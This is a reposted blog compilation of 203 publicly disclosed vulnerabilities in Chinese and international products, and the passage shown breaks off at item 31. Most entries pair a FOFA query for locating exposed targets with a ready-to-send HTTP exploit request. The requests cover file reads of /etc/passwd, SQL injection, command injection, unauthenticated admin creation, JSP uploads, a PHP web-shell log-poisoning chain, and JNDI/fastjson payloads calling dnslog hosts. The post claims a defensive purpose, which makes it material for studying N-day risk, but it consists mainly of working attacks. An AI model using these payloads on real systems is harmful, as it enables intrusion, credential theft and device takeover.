Compilation of publicly disclosed internet vulnerabilities 202309-202406 (repost)

Posted on 2024-6-5 14:31:29

Compilation of publicly disclosed internet vulnerabilities 202309-202406
道一安全 2024-06-05 07:41 Beijing
The following article is from 网络安全新视界 (author: 网络安全新视界).

Purpose: Exploitation of N-day vulnerabilities accounts for a large share of real-world attacks; this article is intended to help defenders. Defensive teams can use its contents for risk checks.

Vulnerability sources: The article covers 203 POCs for high-impact vulnerabilities disclosed publicly in China and abroad between September 2023 and May 2024. All of them come from other public accounts or websites on the internet and were compiled and published by the 网络安全新视界 team.

Security patches: All of the vulnerabilities are public; for patches or remediation guidance, contact the product vendor.

Article content: Because of length limits, a few over-long POCs are replaced with the placeholder PAYLOAD; search for the complete POC yourself if you need it.

Legal rights: If any content infringes a party's legitimate rights, contact the 网络安全新视界 team through the backend to have the relevant content removed.

Statement

To keep things simple and easy to browse, there is no "reply to get the full list" gate. This article is the most complete version; when using it, press F12 and search for keywords.

Bookmark this article if you need it. You can also follow this public account (网络安全新视界).

Contents

1. StarRocks MPP database unauthorized access
2. Casdoor static arbitrary file read
3. EasyCVR smart edge gateway userlist information disclosure
4. EasyCVR video management platform arbitrary user addition
5. NUUO NVR video storage management device remote command execution
6. Sangfor NGAF arbitrary file read
7. Hongyun active safety monitoring cloud platform arbitrary file download
8. Phicomm router RCE
9. DocCMS keyword unauthenticated SQL injection
10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
12. Jorani < 1.0.2 remote command execution
13. Hongfan iOffice ioFileDown arbitrary file read
14. Huaxia ERP (jshERP) sensitive information disclosure
15. Huaxia ERP getAllList information disclosure
16. Hongfan HFOffice (医微云) SQL injection
17. Dahua DSS itcBulletin SQL injection
18. Dahua DSS digital surveillance system user_edit.action information disclosure
19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
20. Dahua ICC intelligent IoT management platform arbitrary file read
21. Dahua ICC intelligent IoT management platform random remote code execution
22. Dahua ICC intelligent IoT management platform log4j remote code execution
23. Dahua ICC intelligent IoT management platform fastjson remote code execution
24. Yonyou NC 6.5 accept.jsp arbitrary file upload
25. Yonyou NC registerServlet JNDI remote code execution
26. Yonyou NC linkVoucher SQL injection
27. Yonyou NC showcontent SQL injection
28. Yonyou NC grouptemplet arbitrary file upload
29. Yonyou NC down/bill SQL injection
30. Yonyou NC importPml SQL injection
31. Yonyou NC runStateServlet SQL injection
32. Yonyou NC complainbilldetail SQL injection
33. Yonyou NC downTax/download SQL injection
34. Yonyou NC warningDetailInfo interface SQL injection
35. Yonyou NC-Cloud importhttpscer arbitrary file upload
36. Yonyou NC-Cloud soapFormat XXE
37. Yonyou NC-Cloud IUpdateService XXE
38. Yonyou U8 Cloud smartweb2.RPC.d XXE
39. Yonyou U8 Cloud RegisterServlet SQL injection
40. Yonyou U8-Cloud XChangeServlet XXE
41. Yonyou U8 Cloud MeasureQueryByToolAction SQL injection
42. Yonyou GRP-U8 SmartUpload01 file upload
43. Yonyou GRP-U8 userInfoWeb SQL injection leading to RCE
44. Yonyou GRP-U8 bx_dj_check.jsp SQL injection
45. Yonyou GRP-U8 ufgovbank XXE
46. Yonyou GRP-U8 sqcxIndex.jsp SQL injection
47. Yonyou GRP A++Cloud government finance cloud arbitrary file read
48. Yonyou U8 CRM swfupload arbitrary file upload
49. Yonyou U8 CRM uploadfile.php interface arbitrary file upload
50. QDocs Smart School 6.4.1 filterRecords SQL injection
51. 云时空 social commerce ERP validateLoginName SQL injection
52. Weaver E-Office json_common.php SQL injection
53. DPTech VPN Service arbitrary file upload
54. Chanjet T+ getstorewarehousebystore remote code execution
55. Chanjet T+ getdecallusers information disclosure
56. Chanjet T+ RRATableController, Ufida.T.DI.UIP.ashx deserialization RCE
57. Chanjet T+ keyEdit.aspx SQL injection
58. Chanjet T+ KeyInfoList.aspx SQL injection
59. XETUX software dynamiccontent.properties.xhtml remote code execution
60. Byzoro Smart management platform importexport.php SQL injection
61. 浙大恩特 customer resource management system fileupload arbitrary file upload
62. IP-guard WebServer remote command execution
63. IP-guard WebServer arbitrary file read
64. 捷诚 management information system CWSFinanceCommon SQL injection
65. 优卡特 face-recognition smart management platform 1.0.55.0.0.1 permission bypass
66. Wanhu ezOFFICE collaborative management platform SendFileCheckTemplateEdit SQL injection
67. Wanhu ezOFFICE wpsservlet arbitrary file upload
68. Wanhu ezOFFICE wf_printnum.jsp SQL injection
69. Wanhu ezOFFICE contract_gd.jsp SQL injection
70. Wanhu ezEIP success command execution
71. 邦永 PM2 project management system Global_UserLogin.aspx SQL injection
72. Seeyon OA getAjaxDataServlet XXE
73. GeoServer wms remote code execution
74. Seeyon M3-server 6_1sp1 deserialization RCE
75. Telesquare TLR-2005Ksh router admin.cgi RCE
76. 新开普 campus service management platform service.action remote command execution
77. F22 apparel management software UploadHandler.ashx arbitrary file upload
78. pkpmbs construction quality supervision system FileUpload.ashx file upload
79. BYTEVALUE flow-control router remote command execution
80. 速达天耀 software DesignReportSave.jsp interface arbitrary file upload
81. Uniview video surveillance main-cgi password disclosure
82. 思福迪 LOGBASE operations security management system test_qrcode_b remote command execution
83. JeecgBoot testConnection remote command execution
84. Jeecg-Boot JimuReport queryFieldBySql template injection
85. SysAid On-premise < 23.3.36 remote code execution
86. Japanese tosei self-service laundry machine RCE
87. DBAppSecurity 明御 security gateway aaa_local_web_preview file upload
88. DBAppSecurity 明御 security gateway aaa_portal_auth_config_reset remote command execution
89. Seeyon FE collaborative office platform editflow_manager SQL injection
90. Hikvision IP network intercom broadcast system 3.0.3_20201113_RELEASE remote command execution
91. Hikvision integrated security management platform orgManage/v1/orgs/download arbitrary file read
92. Hikvision operations management center session command execution
93. QiAnXin 网神 SecGate3600 firewall app_av_import_save arbitrary file upload
94. QiAnXin 网神 SecGate3600 firewall obj_area_import_save arbitrary file upload
95. Apache OFBiz < 18.12.10 xmlrpc remote code execution
96. Apache OFBiz 18.12.11 groovy remote code execution
97. OneBlog v2.2.2 blog Shiro deserialization remote command execution
98. SpiderFlow crawler platform remote command execution
99. Ncast high-definition intelligent recording system busiFacade RCE
100. Likeshop 2.5.7.20210311 File.php userFormImage file upload
101. Ivanti Policy Secure 22.6 command injection
102. Ivanti Pulse Connect Secure VPN SSRF leading to remote code execution
103. Ivanti Pulse Connect Secure VPN XXE
104. Totolink T8 device cstecgi.cgi getSysStatusCfg information disclosure
105. SpringBlade v3.2.0 export-user SQL injection
106. SpringBlade dict-biz/list SQL injection
107. SpringBlade tenant/list SQL injection
108. D-Tale 3.9.0 SSRF
109. Jenkins CLI arbitrary file read
110. GoAnywhere MFT unauthenticated administrator creation
111. WordPress Plugin HTML5 Video Player SQL injection
112. WordPress Plugin NotificationX SQL injection
113. WordPress Automatic plugin arbitrary file download and SSRF
114. WordPress MasterStudy LMS plugin SQL injection
115. WordPress Bricks Builder <= 1.9.6 RCE
116. WordPress js-support-ticket file upload
117. WordPress LayerSlider plugin SQL injection
118. Beijing 百绰 S210 management platform uploadfile.php arbitrary file upload
119. Beijing 百绰 S20 backend sysmanageajax.php SQL injection
120. Beijing 百绰 S40 management platform import web.php arbitrary file upload
121. Beijing 百绰 S42 management platform userattestation.php arbitrary file upload
122. Beijing 百绰 s200 management platform /importexport.php SQL injection
123. Atlassian Confluence template injection code execution
124. Hunan 建研 engineering quality inspection system arbitrary file upload
125. ConnectWise ScreenConnect authentication bypass
126. Aiohttp path traversal
127. Glodon Linkworks DataExchange.ashx XXE
128. Adobe ColdFusion deserialization
129. Adobe ColdFusion arbitrary file read
130. Laykefu customer service system arbitrary file upload
131. Mini-Tmall <= 20231017 SQL injection
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
133. H5 cloud mall file.php file upload
134. Netentsec NS-ASG application security gateway index.php SQL injection
135. Netentsec NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
136. NextChat cors SSRF
137. Fujian 科立迅 communication command and dispatch platform down_file.php SQL injection
138. Fujian 科立讯 communication command and dispatch platform pwd_update.php SQL injection
139. Fujian 科立讯 communication command and dispatch platform editemedia.php SQL injection
140. Fujian 科立讯 communication command and dispatch platform get_extension_yl.php SQL injection
141. 建科立讯 communication command and dispatch management platform ajax_users.php SQL injection
142. CMSV6 vehicle monitoring platform weak password
143. Netis WF2780 v2.1.40144 remote command execution
144. D-Link nas_sharing.cgi command injection
145. Palo Alto Networks PAN-OS GlobalProtect command injection
146. MajorDoMo thumb.php unauthenticated remote code execution
147. RaidenMAILD mail server v.4.9.4 path traversal
148. CrushFTP authentication bypass template injection
149. AJ-Report open-source data dashboard remote command execution
150. AJ-Report 1.4.0 authentication bypass and remote code execution
151. AJ-Report 1.4.1 pageList SQL injection
152. Progress Kemp LoadMaster remote command execution
153. gradio arbitrary file read
154. 天维尔 fire rescue operations dispatch platform SQL injection
155. 六零导航页 file.php arbitrary file upload
156. TBK DVR-4104/DVR-4216 OS command injection
157. 美特 CRM upload.jsp arbitrary file upload
158. Mura CMS processAsyncObject SQL injection
159. 英飞达 medical imaging archiving and communication system WebJobUpload arbitrary file upload
160. Sonatype Nexus Repository 3 directory traversal and file read
161. 科拓 smart parking billing system Webservice.asmx arbitrary file upload
162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
163. 号卡极团 distribution management system ue_serve.php arbitrary file upload
164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
165. OrangeHRM 3.3.3 SQL injection
166. 中成科信 ticketing management platform SeatMapHandler SQL injection
167. 精益 value management system DownLoad.aspx arbitrary file read
168. Hongjing EHR OutputCode arbitrary file read
169. Hongjing EHR downlawbase SQL injection
170. Hongjing EHR DisplayExcelCustomReport arbitrary file read
171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
172. DT high-definition license plate recognition camera arbitrary file read
173. Check Point security gateway arbitrary file read
174. Jinher OA C6 FileDownLoad.aspx arbitrary file read
175. Jinher OA C6 IncentivePlanFulfill.aspx SQL injection
176. Telecom gateway configuration management system rewrite.php file upload
177. H3C router sensitive information disclosure
178. H3C campus network self-service system flexfileupload arbitrary file upload
179. 建文 engineering management system arbitrary file read
180. 帮管客 CRM jiliyu SQL injection
181. 润申 enterprise standardization management system UpdataLogHandler.ashx SQL injection
182. 润申 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
183. Guangzhou 图创 library cluster management system updOpuserPw SQL injection
184. 迅饶 X2Modbus gateway AddUser arbitrary user addition
185. 瑞友天翼 application virtualization system SQL injection
186. F-logic DataCube3 SQL injection
187. Mura CMS processAsyncObject SQL injection
188. 叁体-佳会 video conferencing attachment arbitrary file read
189. 蓝网科技 clinical viewer system deleteStudy SQL injection
190. Short-video matrix marketing system poihuoqu arbitrary file read
191. 亿赛通 electronic document security management system NavigationAjax SQL injection
192. 富通天下 foreign trade ERP UploadEmailAttr arbitrary file upload
193. Hillstone 云鉴 security management system setsystemtimeaction command execution
194. 飞企互联 FE enterprise operations management platform uploadAttachmentServlet arbitrary file upload
195. 飞鱼星 internet behavior management system send_order.cgi command execution
196. Henan 风速科技 unified authentication platform password reset
197. 浙大恩特 customer resource management system Quotegask_editAction SQL injection
198. Alibaba Cloud Drive (阿里云盘) WebDAV command injection
199. cockpit assetsmanager_upload interface file upload
200. SeaCMS video management system dmku SQL injection
201. Founder full-media news editing system binary SQL injection
202. 微擎 AccountEdit arbitrary file upload
203. 红海云 EHR PtFjk file upload

POC list

1. StarRocks MPP database unauthorized access
FOFA: title="StarRocks"
GET /mem_tracker HTTP/1.1
Host: URL

2. Casdoor static arbitrary file read
FOFA: title="Casdoor"
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: xx.xx.xx.xx:9999
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

3. EasyCVR smart edge gateway userlist information disclosure
FOFA: title="EasyCVR"
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.1
Host: xx.xx.xx.xx

4. EasyCVR video management platform arbitrary user addition
FOFA: title="EasyCVR"

Change password to the MD5 of your own password.
POST /api/v1/adduser HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1

5. NUUO NVR video storage management device remote command execution
FOFA: title="Network Video Recorder Login"
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
Host: xx.xx.xx.xx

6. Sangfor NGAF arbitrary file read
FOFA: title="SANGFOR | NGAF"
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1
Host:

7. Hongyun active safety monitoring cloud platform arbitrary file download
FOFA: body="./open/webApi.html"
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1
Host:

8. Phicomm router RCE
FOFA: icon_hash="-1344736688"
After logging into the backend with the default account admin, perform the following:
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1
Host: x.x.x.x
Cookie: sysauth=<cookie obtained from the step-one login>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36

------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootEnablestatus"

%s
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootrange"

12:00; id;
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="wifiRebootendrange"

%s:
------WebKitFormBoundaryxbgjoytz
Content-Disposition: form-data; name="cururl2"


------WebKitFormBoundaryxbgjoytz--

9. DocCMS keyword unauthenticated SQL injection
FOFA: app="Doccms"
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1
Host: x.x.x.x

The payload is the double URL-encoding of the following statement:

' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#

10. Landray EIS smart collaboration platform api.aspx arbitrary file upload
FOFA: icon_hash="953405444"

After the upload, the response contains the path of the uploaded file.
POST /eis/service/api.aspx?action=saveImg HTTP/1.1
Host: x.x.x.x:xx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36
Content-Length: 197
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu

------WebKitFormBoundaryxdgaqmqu
Content-Disposition: form-data; name="file"; filename="icfitnya.txt"
Content-Type: text/html

jmnqjfdsupxgfidopeixbgsxbf
------WebKitFormBoundaryxdgaqmqu--

11. Landray EIS smart collaboration platform doc_fileedit_word.aspx SQL injection
FOFA: icon_hash="953405444" || app="Landray-EIS智慧协同平台"
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

12. Jorani < 1.0.2 remote command execution
FOFA: title="Jorani"
Step 1: obtain the cookie.
GET /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
Connection: close
Accept-Encoding: gzip

The csrf_cookie_jorani value in the response is used in the subsequent requests.
HTTP/1.1 200 OK
Connection: close
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html; charset=UTF-8
Date: Tue, 24 Oct 2023 09:34:28 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
Pragma: no-cache
Server: Apache/2.4.54 (Debian)
Set-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
Vary: Accept-Encoding

Step 2: POST request; the written PHP function executes the base64-encoded value it receives.
POST /session/login HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36
Connection: close
Content-Length: 252
Content-Type: application/x-www-form-urlencoded
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
Accept-Encoding: gzip

csrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor

Step 3: send the following request to the target to run the id command; the request-header value ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs= is the base64-encoded command.
GET /pages/view/log-2023-10-24 HTTP/1.1
Host: 192.168.190.30
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
K1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
X-REQUESTED-WITH: XMLHttpRequest
Accept-Encoding: gzip

13. Hongfan iOffice ioFileDown arbitrary file read
FOFA: app="红帆-ioffice"
GET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Encoding: gzip

14. Huaxia ERP (jshERP) sensitive information disclosure
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

15. Huaxia ERP getAllList information disclosure
CVE-2024-0490
FOFA: body="jshERP-boot"
The disclosed content includes usernames and passwords.
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
Host: 192.168.40.130:100
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
Connection: close
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Accept-Language: en
sec-ch-ua-platform: Windows
Accept-Encoding: gzip

16. Hongfan HFOffice (医微云) SQL injection
FOFA: title="HFOffice"
The PoC calls a function that computes the MD5 value of 1234.
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

17. Dahua DSS itcBulletin SQL injection
FOFA: app="dahua-DSS"
POST /portal/services/itcBulletin?wsdl HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 345
Accept-Encoding: gzip

<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
  <s11:Body>
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>
      <netMarkings>
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
      </netMarkings>
    </ns1:deleteBulletin>
  </s11:Body>
</s11:Envelope>

18. Dahua DSS digital surveillance system user_edit.action information disclosure
FOFA: app="dahua-DSS"
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

19. Dahua DSS digital surveillance system attachment_clearTempFile.action SQL injection
FOFA: app="dahua-DSS"
GET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

20. Dahua ICC intelligent IoT management platform arbitrary file read
FOFA: body="*客户端会小于800*"
GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

21. Dahua ICC intelligent IoT management platform random remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Length: 161
Accept-Encoding: gzip
Connection: close
Content-Type: application/json;charset=utf-8

{
"a":{
   "@type":"com.alibaba.fastjson.JSONObject",
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
  }""
}

22. Dahua ICC intelligent IoT management platform log4j remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Content-Type: application/json;charset=utf-8

{
"loginName":"${jndi:ldap://dnslog}"
}

23. Dahua ICC intelligent IoT management platform fastjson remote code execution
FOFA: icon_hash="-1935899595"
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: application/json;charset=utf-8
Accept-Encoding: gzip
Connection: close

{
    "a":{
        "@type":"com.alibaba.fastjson.JSONObject",
        {"@type":"java.net.URL","val":"http://DNSLOG"}
        }""
}

24. Yonyou NC 6.5 accept.jsp arbitrary file upload
FOFA: icon_hash="1085941792"
POST /aim/equipmap/accept.jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
Connection: close
Content-Length: 449
Accept: */*
Accept-Encoding: gzip
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc

-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"
Content-Type: text/plain

<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc
Content-Disposition: form-data; name="fname"

\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--

25. Yonyou NC registerServlet JNDI remote code execution
FOFA: app="用友-UFIDA-NC"
POST /portal/registerServlet HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
Content-Type: application/x-www-form-urlencoded

type=1&dsname=ldap://dnslog

26. Yonyou NC linkVoucher SQL injection
FOFA: app="用友-UFIDA-NC"
GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

27. Yonyou NC showcontent SQL injection
FOFA: icon_hash="1085941792"
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: identity
Connection: close
Content-Type: text/xml; charset=utf-8

28. Yonyou NC grouptemplet arbitrary file upload
FOFA: icon_hash="1085941792"
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36
Connection: close
Content-Length: 268
Content-Type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Accept-Encoding: gzip

------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
Content-Type: application/octet-stream

<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--

/uapim/static/pages/nc/head.jsp

29. Yonyou NC down/bill SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

30. Yonyou NC importPml SQL injection
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
Host: your-ip
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Connection: close

------WebKitFormBoundaryH970hbttBhoCyj9V
Content-Disposition: form-data; name="Filedata"; filename="1.jpg"
Content-Type: image/jpeg

------WebKitFormBoundaryH970hbttBhoCyj9V--

31. Yonyou NC runStateServlet SQL injection
Version: <=6.5
FOFA: icon_hash="1085941792" && body="/logo/images/logo.gif"
GET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1
Host: host
